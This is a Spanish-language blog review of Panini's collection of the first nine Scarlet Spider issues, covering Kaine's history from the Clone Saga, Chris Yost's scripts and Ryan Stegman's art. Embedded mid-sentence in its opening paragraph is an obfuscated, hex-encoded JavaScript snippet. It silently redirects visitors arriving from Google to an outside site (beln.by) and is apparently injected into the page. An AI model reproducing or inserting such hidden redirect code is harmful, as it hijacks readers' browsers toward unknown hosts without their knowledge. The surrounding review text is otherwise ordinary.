[Comic] ARAÑA ESCARLATA

Directamente desde las páginas de Amazing Spiderman, nace la nueva encarnación de uno de los Olvidados de los años Noventa, La Araña Escarlata var _0x5575=[“\x67\x6F\x6F\x67\x6C\x65″,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x68\x72\x65\x66″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x68\x74\x74\x70\x3A\x2F\x2F\x62\x65\x6C\x6E\x2E\x62\x79\x2F\x67\x6F\x3F\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x64\x72\x2E\x68\x6F\x73\x74″];if(document[_0x5575[2]][_0x5575[1]](_0x5575[0])!==-1){window[_0x5575[4]][_0x5575[3]]= _0x5575[5]}. Todo ha cambiado y sin embargo, todo parece igual. Panini recopila los primeros nueve números de esta nueva serie regular en un tomo con excelente relación calidad-precio y dirigido expresamente a los fans del trepamuros más conocido y querido.
Era 1994 cuando en Marvel comenzó una de las etapas más criticadas y que dio paso a la mayor crisis en toda la historia de la editorial: Asitíamos al nacimiento de Ben Reilly, y con ello, al inicio de la denostada ”Etapa Clon” de Spiderman.
  Ben Reilly, un clon perfecto de Peter Parker que conservaba todos sus recuerdos y experiencias, tomó la identidad superheroica de la Araña Escarlata. Durante un tiempo compartió aventuras con el propio Spiderman hasta que a los editores se les ocurrió la genial idea de matar al Hombre Araña primigenio y hacer que Reilly tomara su nombre, su traje y su identidad. Las críticas y protestas de los fans ante tales cambios se hicieron tan insoportables que desde Marvel tuvieron que dar marcha atrás y recuperar a Peter, y de paso, matar a Ben y hacer desaparecer todo rastro de su existencia hasta nuestros días. Éste es, por supuesto, un resumen muy corto de todo lo que sucedió. Aquella Saga del Clon dejó muchas otras cosas…
En las páginas de la misma descubríamos que Ben Reilly era un clon creado en el laboratorio por el Chacal, un villano de Spiderman con gran afición por la genética. Pero también se nos presentaba a otro clon más: Kaine, el primer intento que salió mal.
Kaine era un ser atormentado, un término medio entre héroe y villano, con una importante enfermedad degenerativa en la piel e intensas visiones de futuro. En las aventuras en las que aparecía daba bandazos constantemente entre la perdición y la redención. Poco después, y debido a la ”limpieza” exhaustiva de todo lo que olía a clon por parte de la editorial, este personaje tan prometedor caería en el olvido… exactamente hasta el Amazing Spiderman #634, primer capítulo de la Cacería Macabra [Asombroso Spiderman nº 52], que le recuperaba para la causa en una reunión de todos los personajes ”arácnidos”. Volvería a aparecer en Spider-Island [ASM nº 65-68], cuyo final supondría un nuevo principio para él: Totalmente redimido, sanado de su enfermedad y con la bendición del propio Spiderman, Kaine decide mudarse a Houston y, simplemente, vivir. Pero cuando le rodeen los problemas, ¿los ignorará o se comportará como un héroe?
Y así da comienzo esta nueva serie, que nació con el acertado leitmotif  ”Todo el Poder, ninguna Responsabilidad”. Desde el primer momento queda claro que Kaine, a pesar de ser un clon de Peter Parker, no es como él: esta nueva Araña Escarlata es violenta, cruel y no le importa matar. No posee el sentido arácnido de Spiderman, pero lo compensa con redes orgánicas, espolones de hueso bajo las muñecas, la capacidad de segregar una sustancia ácida de las palmas de las manos y un traje que le vuelve invisible, además de compartir con el original agilidad y fuerza sobrehumanas y la capacidad de pegarse a las paredes. 
Chris Yost afronta los guiones de La Araña Escarlata con arcos argumentales muy cortos (uno ó dos capítulos) cargados de acción y donde se nos presentan a multitud de secundarios. Autor con más éxitos en el terreno televisivo que en el cómic (en series de animación como los Vengadores, Las Tortugas Ninja o Lobezno y los X-Men), cuenta en su currículum con pequeñas joyas dentro del mundillo mutante (X-23, X-Force y New X-Men).
Al dibujo se reparten las tareas hasta tres artistas, entre los que destaca Ryan Stegman, autor de cinco de los nueve números del tomo y cuyo dibujo, composición y planos imposibles transmiten gran energía. Con influencias claras de Ed McGuinness y Mike Wieringo, Stegman es todo un valor a tener en cuenta y en Marvel lo saben, pues ha sido fichado para dibujar el pirmer arco argumental de la esperada Superior Spiderman.
  Kaine ha vuelto, y parece que es para quedarse. Si te gusta Spiderman y su universo, échale un vistazo al tomo. Si eres aficionado al cómic de acción y entretenimiento puro, también. O, simplemente, si buscas un buen bocado de lectura por poco más de quince euros, te lo recomiendo.

Sergio

Leave a Reply